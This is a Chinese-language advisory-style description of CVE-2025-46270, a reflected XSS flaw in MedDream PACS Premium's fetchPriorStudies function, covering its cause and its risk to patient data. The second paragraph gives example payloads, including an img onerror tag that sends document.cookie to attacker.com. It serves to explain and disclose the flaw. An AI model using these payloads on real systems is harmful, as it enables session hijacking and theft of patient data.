CVE-2025-46270CVE-2025-46270是MedDream PACS Premium 7.3.6.870版本中存在的一个反射型跨站脚本攻击(XSS)漏洞。该漏洞位于应用的fetchPriorStudies功能中,攻击者可以通过精心构造恶意URL来触发此漏洞。当受害者点击或访问攻击者提供的恶意链接时,嵌入在URL中的恶意JavaScript代码会在受害者浏览器中执行,从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。由于该漏洞不需要认证即可利用,且攻击复杂度较低,因此对使用该版本PACS系统的医疗机构构成了中等程度的安全威胁。MedDream PACS Premium是一款广泛应用于医疗机构的医学影像存档与传输系统,用于存储、管理和查看医学影像如X光、CT、MRI等。医疗影像系统通常存储大量敏感的患者隐私信息,一旦被攻击者利用,可能导致大规模的患者数据泄露,对医疗机构的声誉和患者权益造成严重影响。
该反射型XSS漏洞存在于MedDream PACS Premium的fetchPriorStudies功能模块中。漏洞的根本原因在于应用程序对用户输入的URL参数缺乏充分的输入验证和输出编码。当用户请求包含恶意脚本代码的参数时,服务器直接将用户输入的数据反射回HTTP响应中,而没有进行适当的HTML转义或内容安全策略(CSP)限制。攻击者可以利用这一点,在URL参数中插入恶意JavaScript代码,如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等。当受害者访问该恶意URL时,浏览器会将其视为可信网站的脚本并执行,从而绕过同源策略限制。攻击者通常通过钓鱼邮件、社交工程或其他渠道诱导用户点击恶意链接。由于该漏洞位于fetchPriorStudies功能中,攻击者可能针对正在访问患者研究列表的医疗工作人员,窃取其会话凭证或医疗影像数据。攻击者还可以利用窃取的会话令牌冒充合法用户进行进一步的操作,包括查看、修改或删除敏感的患者医学影像数据。